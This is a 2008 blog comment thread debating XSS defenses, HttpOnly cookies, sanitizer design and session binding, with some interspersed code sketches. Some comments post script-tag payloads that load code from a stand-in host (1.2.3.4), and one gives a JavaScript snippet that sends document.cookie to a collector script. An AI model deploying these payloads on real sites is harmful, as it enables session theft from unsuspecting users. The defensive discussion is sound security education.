With recent vulnerabilities like the Gmail vulnerability I'm really starting to question whether it is possible to write a secure web app that people will still want to use. Even if it is, it seems like it is little more than a swarm of technologies that interact in far more ways than are immediately obvious.
Matt Green on August 29, 2008 06:21 AM> Why not keep a dictionary that maps the cookie credential to the IP
> used when the credential was granted, and make sure that the IP
> matches the dictionary entry on every page access?"
Most of us get our IP addresses through DHCP, which means they can change whenever our system (or router) is rebooted.
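For reference, the dictionary scheme being debated can be sketched in a few lines of Python. The class name SessionStore and its methods are made up for illustration; this is not code from any particular framework.

```python
import secrets


class SessionStore:
    """Maps each session token to the IP address it was issued to."""

    def __init__(self):
        self._ip_by_token = {}

    def issue(self, client_ip: str) -> str:
        # Generate an unguessable token and remember who asked for it.
        token = secrets.token_urlsafe(32)
        self._ip_by_token[token] = client_ip
        return token

    def is_valid(self, token: str, client_ip: str) -> bool:
        # Unknown tokens map to None, which never equals a real address.
        return self._ip_by_token.get(token) == client_ip


store = SessionStore()
token = store.issue("203.0.113.7")
print(store.is_valid(token, "203.0.113.7"))   # True
print(store.is_valid(token, "198.51.100.9"))  # False
```

The second check is the whole point of the scheme and also its weakness: a stolen token replayed from another address is rejected, but so is a legitimate user whose address changed after a DHCP renewal.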
T.E.D. on August 29, 2008 06:30 AMI'm still quite leery of your sanitiser, for the reasons I described on RefactorMyCode: you're doing blacklisting even if you think you're doing whitelisting. Your blacklist is more or less "anything that looks like BLAH BLAH X BLAH, where X isn't on the whitelist". As you can see, it's very hard to write that rule correctly. Your bouncer is still kicking bad guys out of the queue. Instead your bouncer should be picking up good guys and carrying them through the door. If the bouncer messes up, the default behaviour should be nobody gets in, not everybody getting in!
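One way to picture the "bouncer carries the good guys through the door" design is a sanitizer that never copies input to output: it parses the input and re-emits only what it recognizes. The sketch below uses Python's standard html.parser; the tag list and the names AllowlistSanitizer and sanitize_html are assumptions for illustration, not the code under discussion.

```python
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "ul", "ol", "li", "pre", "code"}  # illustrative list


class AllowlistSanitizer(HTMLParser):
    """Rebuilds output from scratch; nothing from the input is passed through raw."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")  # attributes are always dropped

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(html.escape(data))  # all text is re-encoded


def sanitize_html(text: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()  # flush any trailing text that was still buffered
    return "".join(parser.parts)


print(sanitize_html('<b onclick="evil()">hi</b><script>alert(1)</script>'))
```

Because the output is assembled only from allowlisted tag names and escaped text, anything the parser does not understand ends up dropped or encoded rather than passed through. The sketch does not balance unclosed tags, which a real implementation would also want to handle.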
Weeble on August 29, 2008 06:32 AMAs an interesting side note to those who say you should sanitize late rather than early:
I have run into all kinds of XSS when opening tables in my database. Yes, I learned that opening said tables in PHPMyAdmin might not be a good idea.
That was an interesting experience to be sure.
I have to agree with what most people are saying. Allowing direct HTML posting that other users can see is sure to cause at least headaches, if not major problems. You're better off using some kind of wiki system, or some kind of subset of HTML, where only the tags you are interested in are allowed.
Practicality on August 29, 2008 06:35 AMHey, But how do I set the HttpOnly flag on cookies. I certainly did not find it in the preferences/options dialog.
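HttpOnly is not a browser preference; it is an attribute the server adds to the Set-Cookie response header. As a small illustration, this is how it looks with Python's standard http.cookies module (the cookie name and value are placeholders):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "ig2fac55"        # placeholder session id
cookie["session"]["path"] = "/"
cookie["session"]["httponly"] = True  # ask the browser to hide it from document.cookie

# The resulting line is what the server sends in its HTTP response.
header = cookie.output()
print(header)
```

Most web frameworks expose the same switch under a similar name, so in practice it is usually a one-line change on the server.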
Arvind on August 29, 2008 06:56 AM>> IP spoofing over UDP = easy, IP spoofing over TCP = hard
The biggest problem in security is that a lot of people think that "hard" is the same as "impossible". It is not. We can patch this and that hole after we've completed implementing our design and make it harder to attack our system, but we'll never really know if we're 100% safe.
In that regard, giving up is not lame. Playing catch-up is better than not. It's also better than going back to the drawing board when you're well into beta (aka scope creep), unless you have infinite budget. I do believe, though, that in the design stage, as Schneier says, security is about trade-offs. If a feature introduces security risks that are absolutely not tolerable, then it might indeed be a good idea to drop it altogether, if designing built-in protection against a class of attacks is not feasible.
Leo Horie on August 29, 2008 07:03 AM>> IP spoofing over UDP = easy, IP spoofing over TCP = hard
As someone who has written an IP stack, I'm not really sure what about TCP makes it particularly hard. I'm not saying it isn't, I just don't see why it would be offhand.
It might (might) be tough to push aside the rightful IP holder from an established connection. However, initiating a connection with a spoofed IP should be just as easy as spoofing your IP in UDP and getting the victim to respond to you.
T.E.D. on August 29, 2008 07:10 AMLet's see if this works.....
<script type=text/javascript src="http://1.2.3.4:81/KillCodingHorror.js" />
It's amazing how easily cookies can be hijacked. Shouldn't there be some way to encrypt them too so that even if they do manage to get the cookie, it's useless?
Kris on August 29, 2008 08:45 AM> I have run into all kinds of XSS when opening tables
> in my database. Yes, I learned that opening said tables
> in PHPMyAdmin might not be a good idea.
That just shows you that PHPMyAdmin is not a safe program. The PHPMyAdmin program could not possibly know whether or not the data in the database has been scrubbed. So it should default to scrubbing it on output. It also can't enforce the rule that all input should be scrubbed before putting it into the database.
It also shows that all programs fall into this same category. There could be an SQL injection vulnerability in your code that lets the user force data into the database unscrubbed. So ALL programs (including yours) should make the assumption that the data could be tainted and scrub it before outputting it to the screen.
It is the one true way to be safe. Making assumptions is always a bad idea. Be sure. Scrub all output.
Matt on August 29, 2008 08:45 AMKris, authentication cookies ARE encrypted. This isn't an issue of privilege escalation by modifying a cookie, it's a simple replay attack.
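The distinction between tampering and replay can be shown with a short Python sketch. It uses an HMAC signature as a stand-in for whatever protection the real authentication cookie has; the key, the cookie format and the function names are all assumptions made for the example.

```python
import hashlib
import hmac

SERVER_KEY = b"example-secret-key"  # hypothetical key, known only to the server


def sign(value: str) -> str:
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify(cookie: str) -> bool:
    value, _, mac = cookie.rpartition(".")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


cookie = sign("user=admin")
tampered = cookie.replace("user=admin", "user=root")
stolen = cookie  # an attacker who copies the cookie has the exact same bytes

print(verify(tampered))  # False: modifying the value breaks the signature
print(verify(stolen))    # True: a verbatim copy is indistinguishable from the original
```

Cryptography on the cookie value stops forgery, but it cannot tell the rightful owner from someone replaying a stolen copy, which is why keeping script away from the cookie matters.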
And with respect to another comment - I wouldn't say that it's technically a blacklist, it really is a whitelist, but the problem is that *it doesn't fail safe*.
A strict parser fails safe. If it can't parse a tag, it just fails on it and the cruft disappears from subsequent output. This uber-dumb "sanitizer" can choke on all kinds of invalid input and proceed to ignore it (i.e. leave it the way it is), but the browser, being "liberal in what it accepts" as Jeff also loves to advocate, will happily try to fix it up and execute whatever badness is inside.
To believe that a few clunky regular expressions would be equally effective is pure geek conceit.
Aaron G on August 29, 2008 09:48 AM@omalley
"If you don't allow unsafe characters, then just completely remove them from input. Done"
Think about what this means. What is an unsafe character?
In the context of the user's message, nothing. It's only when you go to insert that message directly into a HTML/JS document that certain characters take on a different meaning. And so *at that time* you escape them. This way the user's message displays as they intended it AND it doesn't break the HTML. Everyone wins.
It's the same for when you're putting it into SQL, or into a shell-command, or into a URL, etc. You can't store your data escaped for every single purpose in your DB, you need to do the escaping exactly when it's needed and keep your original data raw and intact.
Your policy of stripping "unsafe" characters gets in the way of the user's perfectly legitimate message. And there's absolutely no reason for that.
"You store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%"
There is no hope required. You don't have to "always remember" if you have a standard method of building DB queries and building HTML documents/templating, and it's tested. And you should have this.
Where and when to escape (assuming a DB store):
1. Untrusted data comes in
2. Validate it (do NOT alter it)
And, if it's valid
3. Store it (escape for SQL here)
later, if you want to display it in a HTML page:
retrieve from DB and escape for HTML
or, if you want to use it in a unix command line:
retrieve from DB and escape for shell
or, into a url:
retrieve from DB and URL encode
etc..
The key is not MODIFYING the user's data. Just accept or reject. Then you escape if necessary when you use it in different contexts.
Now you can do anything you want with your data. You don't have to impose confusing constraints on what your users can and can't say.
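The flow described above can be sketched in Python using only the standard library. The table name and sample value are invented for the example; the point is that the stored value stays raw and each output context applies its own escaping.

```python
import html
import shlex
import sqlite3
from urllib.parse import quote

raw = "Smith's <b>Dairy</b>"  # untrusted input, accepted as-is after validation

# Store it: the SQL driver handles escaping through a bound parameter.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE company (name TEXT)")
db.execute("INSERT INTO company (name) VALUES (?)", (raw,))
(stored,) = db.execute("SELECT name FROM company").fetchone()

# Later, escape at the point of use, once per context.
as_html = html.escape(stored)    # for an HTML page
as_url = quote(stored, safe="")  # for a URL component
as_shell = shlex.quote(stored)   # for a Unix command line

print(stored)
print(as_html)
print(as_url)
print(as_shell)
```

The database still holds exactly what the user typed, so a downstream system that needs the plain company name can read it without having to undo anyone's encoding.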
correct on August 29, 2008 09:50 AM
Good comments. Are there any web pages which serve as checklists against XSS so we asp.net developers can implement all these secure ideas?
(Jeff, I saw a comment from you which didn't have a different bg color)
Abdu on August 29, 2008 09:51 AMI absolutely agree with correct above. Too many times I see programs that won't let you include single quotes or other such characters because they consider them to be dangerous. There is no point in that.
As I said above you need to consider all data to potentially be tainted. There is no way to guarantee that the data came from a user and passed through your input scrubber. It could have been inserted using an SQL injection attack or could have come from some COBOL/RPG program upstream. So you have to scrub it on output anyway. Why scrub it both places and end up causing headaches for other systems that you integrate with?
Matt on August 29, 2008 10:08 AM@O'Malley
you said:
> @bex you just screwed anyone who sits behind a proxy server.
um... no.
A proxy means multiple usernames sharing one IP. That's totally fine. It's no different than me running two browsers, logged in as two users. My example blocks multiple IPs sharing one username. Totally different. And as @Clifton says, IP spoofing over TCP is pretty hard... especially if you rotate the session ID.
Back to the issue of sanitizing, I again agree with @Clifton. You don't sanitize input: you FRIGGING REJECT it!
In other words, escape ALL angle brackets, unless it's from a string that EXACTLY MATCHES safe HTML, like:
<b></b>
<i></i>
<ul></ul>
<ol></ol>
<li></li>
<pre></pre>
<code></code>
Don't allow ANYTHING fancy in between the angle brackets. No attributes. No styles. No quotes. No spaces. No parentheses. Yes, it's strict, but who cares?
Being helpful is a security hole.
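A minimal Python sketch of this exact-match rule: encode everything first, then turn back on only the literal tag strings from the list. The function name sanitize is hypothetical, and the approach does not check that tags are balanced.

```python
import html

ALLOWED_TAGS = ("b", "i", "ul", "ol", "li", "pre", "code")


def sanitize(text: str) -> str:
    # Step 1: neutralize every angle bracket, ampersand and quote.
    escaped = html.escape(text, quote=True)
    # Step 2: re-enable only tags that match exactly, with nothing inside them.
    for tag in ALLOWED_TAGS:
        escaped = escaped.replace(f"&lt;{tag}&gt;", f"<{tag}>")
        escaped = escaped.replace(f"&lt;/{tag}&gt;", f"</{tag}>")
    return escaped


print(sanitize("<b>bold</b> and <script>alert('hello XSS!');</script>"))
print(sanitize('<b onclick="evil()">still escaped</b>'))
```

Anything with an attribute, a space or odd nesting simply fails to match in step 2 and stays encoded, so a mistake in the list leaves text looking ugly rather than leaving script running.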
bex on August 29, 2008 11:14 AMhehe.. I recall raiding a certain social networking website (none of the obvious). someone in the channel we were in found a lot of XSS vulnerabilities. used the same setup described in this blog, plus I recommended a similar FF extension, Modify HTTP Headers. Pretty good read, unlike the past entries...
Anon on August 29, 2008 11:27 AM> You don't sanitize input: you FRIGGING REJECT it!
And if the requirements of your application include the ability to accept such input... then what do you suggest? I just love how programmers think that they get the final say when it comes to functional requirements.
"Hell, users don't need to be able to enter single quotes anyway. If I strip single quotes out of the input then my crappy anti-SQL injection code hack will actually appear to work sometimes."
Matt on August 29, 2008 12:16 PM@bex
"A proxy means multiple usernames sharing one IP. That's totally fine."
What I think O'malley was talking about is large ISPs (e.g. AOL) who may push their users through a different proxy IP on every single request. These are the users you'd be screwing over. A few large European ISPs do this too.
With AOL, they maintain a public list of those proxy subnets (http://webmaster.info.aol.com/proxyinfo.html) so if it's an issue you can make your application treat all those IP addresses as one big IP. None of the other ISPs maintain such a list though, so those users would continue to get screwed.
Your method does add some extra protection but it inconveniences a lot of users. In any business I've worked in, kicking out all of AOL is not something management will allow. And the places where you need the security the most (e.g. online banks), that's just not an option.
The amount of protection you're adding is debatable too. You're still allowing people behind the same single proxy IP to steal each others sessions. And at some ISPs, that can be a hell of a lot of people.
I'm not sure the tradeoff for pissing off a bunch of other customers is worth it.
A better approach, depending on your application, is to require re-entry of the user's password for critical actions.
It really depends on the application though, and what's at stake. Dealing with a stolen session ID at a pr0n site is different to dealing with one at a bank.
correct on August 29, 2008 12:18 PMYour JavaScript from the remote server is hardly ideal. Here is some better code I developed while researching this security issue. In order to create a deliberately vulnerable ASP.NET page I had to use two page directives: ValidateRequest="false" and enableEventValidation="false"
jscript = document.createElement("script");
jscript.setAttribute("type", "text/javascript");
jscript.setAttribute("djConfig", "isDebug: true");
jscript.setAttribute("src", "http://o.aolcdn.com/dojo/1.1.1/dojo/dojo.xd.js");
document.getElementsByTagName('head')[0].appendChild(jscript);
window.onload = func;
function func() {
dojo.xhrPost({url:"http://localhost/study/php/cookie-monster.php", content:{u:document.links[0].innerText, l:document.links[0], c:document.cookie}});
}
As others have pointed out, scrubbing input data is not the correct approach. Here's why:
1) The way data needs to be scrubbed depends on the context of how it is going to be used. You can't know up front how the data will ultimately be used so you can't make the proper decision of how it should be scrubbed when it is entered. For example, the OWASP sample scrubber routines distinguish between data that is going to be output as JavaScript, HTML Attributes, and raw HTML (as well as a couple others).
2) You can't guarantee that all data that ends up in your database will have come through your input scrubber. It can come from another compromised system, sql injection, or even flaws in your own input scrubber.
3) Once you find out that XSS data exists in your database it is nearly impossible to fix. For example, if you find out that your original input scrubber was flawed you now have to figure out how to get rid of all of the problem data. If you use output scrubbing instead of input scrubbing you can simply alter your output scrubber and leave the data alone. Always assuming that the data could be bad means that it can stay bad in the database without impacting the application.
4) There is no reason to scrub data more than once. You have to do it on output anyway for the reasons listed above.
5) Other systems are likely to need the data and will puke if it is already scrubbed. Even if you don't interface with any other systems now you never know when your boss is going to come to you and say that his boss wants to be able to run some simple queries using Crystal Reports in which your scrubbed input data can't easily be unscrubbed before use.
6) Scrubbed data can mess up certain types of SQL statements. For example, depending on your scrubbing mechanism, sorting might be broken. LIKE clauses may also not work correctly. You want the data in your database to be in a pure unaltered form for the best results.
These are just a few reasons. There could be many more.
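Point 6 is easy to reproduce. The Python sketch below sorts two made-up names raw and then HTML-encoded, as they would be if the encoding had been applied before storage.

```python
import html

names = ["A'B", "A&Z"]

# Sorting the raw values: '&' (0x26) sorts before "'" (0x27).
raw_order = sorted(names)

# Sorting the values as they would look if stored HTML-encoded.
escaped_order = sorted(html.escape(name) for name in names)

print(raw_order)      # ['A&Z', "A'B"]
print(escaped_order)  # ['A&#x27;B', 'A&amp;Z']
```

The encoded strings sort in the opposite order, so an ORDER BY over pre-encoded data can present rows in a sequence that makes no sense once the page decodes them for display.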
dood mcdoogle on August 29, 2008 12:56 PM<script>alert('hello XSS!');</script>
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
just kiddin...
Kwan on August 29, 2008 02:48 PMJeff, what sites did you use to guide you through making StackOverflow XSS resistant?
I am about to embark on a side project and would like to make the site XSS hardy.
@correct:
Assume the IP address changes. This means either malice, or an ISP with a rotating pool of proxy IP addresses. Either way, you need something stronger to fix this.
You should re-challenge for non-password information (secondary password, favorite color, SSN, phone call, whatever). Then walk them through secondary authorization with SSL certificates... like myopenid does.
@Matt:
> And if the requirements of your application include the
> ability to accept such input... then what do you suggest?
> I just love how programmers think that they get the final
> say when it comes to functional requirements.
You love odd things... and I already took that into account. Read this article about what Jeff is doing, and you'll see my proposal fits in fine with the functional requirements:
http://www.codinghorror.com/blog/archives/001116.html
Offhand... I can think of no good reason why a non-trusted user should be allowed to use more than 5-10 "safe" HTML tags. If I'm wrong, I'd like to see what you think the requirements are.
bex on August 29, 2008 03:00 PM@bex: "Offhand... I can think of no good reason why a non-trusted user should be allowed to use more than 5-10 "safe" HTML tags. If I'm wrong, I'd like to see what you think the requirements are."
Name them. I will bet you a contrite apology that someone will add an 11th that they'd want within 5 minutes.
Tom on August 29, 2008 03:11 PM@bex
Did you just tell me exactly what I told you, but like you thought of it yourself? Yeah, you did.
correct on August 29, 2008 03:28 PMYou really want something the equivalent of Perl's taint-checking on input, but adapted to different classes of data.
This might be a good project to try out the idea Raganwald (Reg Braithwaite) was kicking around a while back in the context of Haskell/ML strongly-typed languages:
Create distinct derived types of strings for data which comes from various contexts and data which may be put into certain contexts. For example, you have UntrustedString and its derived classes UntrustedHeaderValue and UntrustedFormInput. You have a distinct type family of strings for stuff to store in the DB, DBSafeURIString, DBSafeNoHTMLString and DBSafeValidatedHTMLString, and another family for things which may be output back to the browser, for instance StringWithNoHTML, and URIEncodedURIString, and FormattedHTMLString.
You then make your validation functions return these very specific types, as appropriate for what they do, for instance accepting an UntrustedFormInput and returning a DBSafeNoHTMLString, and you let the compiler help you spot, for instance, that you are taking UntrustedFormInput and trying to directly store it as a DBSafeNoHTMLString, or are using a DBSafeValidatedHTMLString in a display function which expects a StringWithNoHTML.
Just saying "I'll HTML-encode all inputs before I store them" doesn't necessarily make anything safer; it's all context dependent. Maybe you HTML-encoded it but you needed to URI-encode it, or vice-versa. Or maybe you just forgot. This doesn't help with the specific problem here of just failing to screen some of the cases you need to validate, but in theory it should help. (Never tried it.)
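A rough Python rendering of the typed-string idea, borrowing two of the type names from the comment above. Python has no compile step, so this sketch relies on type hints (which a checker such as mypy could enforce) plus a runtime check; the function names are made up.

```python
import html
from dataclasses import dataclass


@dataclass(frozen=True)
class UntrustedFormInput:
    value: str


@dataclass(frozen=True)
class StringWithNoHTML:
    value: str


def encode_for_html(data: UntrustedFormInput) -> StringWithNoHTML:
    # The only sanctioned way to obtain a StringWithNoHTML from user input.
    return StringWithNoHTML(html.escape(data.value))


def render_comment(text: StringWithNoHTML) -> str:
    # Refuse anything that has not been through encode_for_html.
    if not isinstance(text, StringWithNoHTML):
        raise TypeError("render_comment needs a StringWithNoHTML")
    return f"<p>{text.value}</p>"


form_input = UntrustedFormInput("<script>alert(1)</script>")
print(render_comment(encode_for_html(form_input)))
```

Passing form_input straight to render_comment raises TypeError, which is the forgotten-encoding mistake the scheme is meant to catch. In a statically typed language the same mistake would be reported at compile time instead.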
Clifton on August 29, 2008 04:40 PM@correct:
Sorry if I didn't give you sufficient credit ;-)
My point was less about re-auth in general, but more about trying to detect who had a legitimately rotating IP address. If detected, cookies can't be trusted... so force the user into an auth scheme that used cookies as secondary to something else. Primary would be SSL Certs or (shudder) Basic Auth over HTTPS.
Thoughts?
@Tom
Here was the list I initially had:
That's probably good enough for anonymous comments. These ones are also safe and useful for untrusted comments:
That's 9 tags. If you want to add a video or an image, you could use a bit of DHTML or Flash to pop up a "media selector" widget for "approved sites": Flickr, YouTube, etc. People get to select URLs to pages, but that's it. On the back end, check the URL to see if it looks hacked. If so, reject it.
For "trusted" contributors, you could open it up even more and use tables, headers, links, etc... in which case you're looking at closer to 20 tags.
For "very trusted" contributors, you get to use attributes like SRC for IMG, and maybe even SCRIPT nodes.
Of course, @dood mcdoogle summed it up quite well when he said that input filtering cannot ever be sufficient... so you always need an output filtering step. However, there's no harm in pre-parsing your data and teaching your audience what will and what will not be tolerated.
bex on August 29, 2008 05:52 PM@Tom
My tags got gobbled... I think these are critical for anonymous comments:
B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE
Anything else, and you probably want to be a "verified" or "trusted" user.
Friends don't let friends allow XSS attacks.
When you emit a session id, record the IP. Naturally you also emitted it over ssl, in which case you record the cert they were granted for the session. Therefore each request is validated by IP and cert?
Nick Waters on August 29, 2008 08:43 PMOnce again an example, that shows that you should never (ever!) use cookies to secure a site
Jack on August 30, 2008 12:00 AM
Pretty neat solution. But this way, you are restricting the use of the cookie to HTTP. So you can't use the cookie client side AND via XMLHttpRequests...
So basically, why does one need a custom cookie? Why not just put the value in the ASP.NET Session? Like this:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
I'd like to see someone crack my PHP HTML sanitizer ...
htmlspecialchars( $string , ENT_QUOTES )
;)
Smart Asp on August 30, 2008 02:52 PM
It's good to know that we rails developers are well covered...
$ ruby script/console
Loading development environment (Rails 2.1.0)
>> text = '<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"'
>> include ActionView::Helpers::SanitizeHelper
>> sanitize(text)
=> "<img src="" /><img src="" />"
:-)
LOL it's so funny how you take any opportunity possible to show that Microsoft's software is better than the alternatives.
Henry on August 30, 2008 06:47 PM@Emmanuel
Neat-o... does Rails have an automated script to test all the known XSS attacks on ha.ckers.org?
I wouldn't be surprised if one or two slipped by...
bex on August 31, 2008 09:02 AMGood post.
You'll find that this technique will help, but it does not solve the underlying problem.
<a target="_new" href="http://www.dragonlasers.com/">Laser Safety Glasses For Raves!!!</a>
Sod
I'm a fan of HttpOnly - http://www.guidanceshare.com/wiki/ASP.NET_1.1_Security_Guidelines_-_Cross-Site_Scripting
J.D. Meier on September 1, 2008 03:13 AMSeveral questions have come up
Why was HttpOnly implemented by Microsoft on IE6 first
Why is HttpOnly broken on Firefox
Why is it not on all browsers
Why is it not on as standard
All of these have one answer - it is a patch to fix a symptom of bad coding and not a solution
It fixes (or partly fixes) one security hole out of a huge number, it is not a universal fix ...
You should sanitize properly everything from the user or you will have a security problem ...
Jaster on September 1, 2008 04:37 AM
> I'd like to see someone crack my PHP HTML sanitizer ...
Google for "htmlspecialchars vulnerability"...
giggles on September 1, 2008 07:11 AM
Already pointed out, but just to show a more practical way to bypass HttpOnly cookies, take a look at XSS Tunnelling - http://labs.portcullis.co.uk/application/xss-tunnelling/xss-tunnel/
Basically it's a defense in depth approach and quite cheap to implement but obviously not the silver bullet.
FM on September 1, 2008 09:27 AMCan't people edit cookies no matter what? They are all stored in a file somewhere on a computer, so people (especially) in linux, for example, could edit this file through terminal (assuming it's read only for normal users), and easily edit the cookies.
Jon Neal on September 1, 2008 10:20 AM
@correct you missed the point entirely and I have a hard time believing that you read what I had to say. Then again I think your comment's been sanitized because I find your latest response barely intelligible. Command-line escaping? wtf?
@bex and others, you can't, from today's web servers, have enough information to detect all spoofed attacks, even with encrypted cookies. Buy a good stateful router/firewall, that's my only point.
Also, you don't just need to worry about XSS. You also need to worry about anything else in between you and a web site that steals cookies. If your friend next to you can steal your cookie, he can 'replay' an action and pretend to be you.
Also, can anyone explain why the ajax double-cookie is any sort of remedy? Maybe I'm just thick, but I don't see why it's a silver bullet.
Also, if you only send authentication cookies over https, and never in plaintext, would xss exploits be able to steal them?
O''Malley on September 1, 2008 07:34 PMWhy the insistence that IE7 is less broken than Firefox in regards to HttpOnly? I see the same bug in both at http://ha.ckers.org/httponly.cgi
Dan Veditz on September 1, 2008 08:55 PM@omalley:
"@correct you missed the point entirely and I have a hard time believing that you read what I had to say."
I read what you said.
"Then again I think your comments been sanitized because I find your latest response barely intelligible."
I'm not surprised.
"Maybe I'm just thick"
...
Re: validating IP - as others have mentioned, the assumption that "changed IP" == "attempted hack" will run into false-positive problems on users from some banks (and perhaps other large companies / AOL users / whatever, but I'm sure about the banks). It's unfortunate.
Now they'll have to copy the html of the login screen with the expired session message and have their javascript output that instead of stealing the cookies.
David on September 2, 2008 11:57 AMSo, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow focus for the blog. :)
Debt Consolidation on September 2, 2008 12:31 PM
The only secure computer is one that is unplugged and (in the case of a laptop) has had its battery removed.
Hell, they're even claiming now that microwaves at a specific frequency and intensity can affect the ole analog 'wet' computer...
mac on September 2, 2008 12:35 PMWouldn't...
XMLHttpRequest.prototype.__defineGetter__('getAllResponseHeaders', function(){ });
be a good workaround for Firefox's issue?
Sean on September 2, 2008 11:47 PMI think what you should implement is explained clearly in the following paper:
http://www.cse.msu.edu/~alexliu/publications/Cookie/cookie.pdf
It's actually not that complicated. HTML-encode everything, so for example <b> becomes &lt;b&gt;, etc... then selectively use text substitution to re-enable what you want, i.e. '&lt;b&gt;' => '<b>'
Everything else remains escaped
Tony
Tony BenBrahim on September 3, 2008 11:08 AM
There seems to be a huge emphasis on cookie stealing, but don't forget that XMLHttpRequest is extremely dangerous since it can mimic any user action! What if an XSS script loads the user profile form, changes the email address, and then requests a new password be sent to it (via the common "Forgot password" form)? The account is hijacked without even touching a cookie. Place additional security around these sensitive areas and do not rely solely on the HttpOnly directive.
Jonah on September 3, 2008 12:34 PM>>> It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user.
You do.
mbhunter on September 3, 2008 01:25 PM@Jonah hits it on the head. There's always a way to hijack a session, even if it's walking up to an unattended computer. Any critical / costly action should require the user to retype their password (or some secondary authentication method).
At least HttpOnly can try to limit what browser scripts can do, and it's a step in the right direction, but as others point out, it's not yet a total fix.
Another fix I can think of: if running script couldn't load other scripts on the fly (i.e. via eval), and your web framework inspected every page's output and removed any script references (and perhaps didn't even allow inline scripts), you could be a lot safer.
Unfortunately there are a lot of vectors of attack, and it's currently very easy for a developer to screw up.
not correct on September 3, 2008 01:55 PM@ Jonah, I think you're right - when making profile changes etc a password should always be required. Good point indeed.
I'm looking at implementing commenting etc on my site (it's a blog, but I don't care too much about the parsing of the blog entries since I'm the only one making them). I was wondering where the author stated that you can't clobber every questionable thing that comes through - Why not? I was thinking of just parsing all angle brackets to their entity codes and then running through the script to look for acceptable tags, but instead of looking at tag letters between < and > brackets, I'd look at letters between entity codes.
Is there anything glaringly wrong with this approach? Script stuff wouldn't get through because I would only allow specific tags such as strong, em, u, strike etc.
Nick Coad on September 3, 2008 06:15 PM@bex: "B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE"
If you expect your users to want BLOCKQUOTE, UL, and OL, you should probably be using a smarter text markup language (MediaWiki-esque) in the first place. ISTR Jeff was considering this route for stackoverflow a while back, but rejected it.
My list of HTML tags needed in this blog comment section: P, B, I, S (and possibly STRIKE), (might as well throw in U for completeness), TT (or CODE), PRE, A HREF (with obviously well-formed URLs only). A NAME is too abusable. SMALL might be nice, but it's abusable. BIG is too abusable.
Anonymous Cowherd on September 3, 2008 06:28 PMRE Another fix and "remove any scripts references" I neglected to say the web framework would remove any script references "that you didn't explicitly allow", which outside of DNS poisoning would pretty much nail the coffin around many XSS.
Then again, it's all a giant band-aid as everything is sent plain-text. It takes only 1 compromised router.........
not correct on September 3, 2008 06:40 PM
I didn't have much of a clue about cookies. This article has opened up a lot of things for me. Thanks buddy.
Web Programming on September 4, 2008 02:02 AM"pick a schedule and stick to it"
Is this blog dying?
me on September 4, 2008 02:46 AM
> Robert C. Barth said: "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?"
> I'm surprised this isn't a standard practice... is there some gotcha to this I haven't thought of? I'm not a web developer myself, so there could be a simple "yeah but" to this solution.
The problem with this is that users with a fast-switching dynamic IP would be continuously prompted to log in again.
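A rough sketch of the dictionary scheme quoted above, assuming an in-memory store. The class name `IpBoundSessions` and its methods are hypothetical, invented here for illustration. It also makes the objection concrete: a legitimate user whose IP changes fails the same check an attacker would.

```python
import secrets


class IpBoundSessions:
    """Maps each cookie credential to the IP it was granted to (illustrative only)."""

    def __init__(self) -> None:
        self._ip_by_token = {}

    def grant(self, client_ip: str) -> str:
        # Issue an unguessable credential and remember which IP received it.
        token = secrets.token_urlsafe(32)
        self._ip_by_token[token] = client_ip
        return token

    def is_valid(self, token: str, client_ip: str) -> bool:
        # Unknown tokens map to None, which never equals a real IP string.
        return self._ip_by_token.get(token) == client_ip


sessions = IpBoundSessions()
token = sessions.grant("203.0.113.5")
print(sessions.is_valid(token, "203.0.113.5"))   # same IP as at login
print(sessions.is_valid(token, "198.51.100.7"))  # stolen cookie, or a user whose IP changed
```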
Tony on September 4, 2008 05:28 AM
Where are the new blogs!!! I am getting antsy =) just wondering
Kyle Woodbury on September 4, 2008 09:05 AM
I wouldn't worry about users with fast switching dynamic IPs. They have a bigger issue that'll plague them until they find a real ISP.
David on September 4, 2008 11:59 AM
I second Kyle, I have been waiting for the latest in hackery... And I am getting rather impatient. Sorry, but I love this blog.... A lot...
Braden on September 4, 2008 08:08 PM
oh cool, this information is really useful and definitely is comment worthy! hehe.
The Planes on September 5, 2008 01:19 AM
Nice blog, I'm glad to find it. I would not mind if it were updated every day. Thank you for the good advice.
Mina Jade on September 5, 2008 03:54 AM
(crickets chirping)
Shmork on September 5, 2008 11:42 AM
Agreed, I checked the page directly in case my Google tool had broken (again). Must be really enjoying the Labor Day weekend.
Matt Ridley on September 5, 2008 12:33 PM
Where are you Jeff??????!!!!
How come you average a good 16-20 posts a month for 4 years and as soon as I start reading, it drops to once a week? So far I'm contenting myself with trawling through back issues, but, you know. When will normal service be resumed? What about Mr Post Often Post Regular?
> How come you average a good 16-20 posts a month for 4 years and as
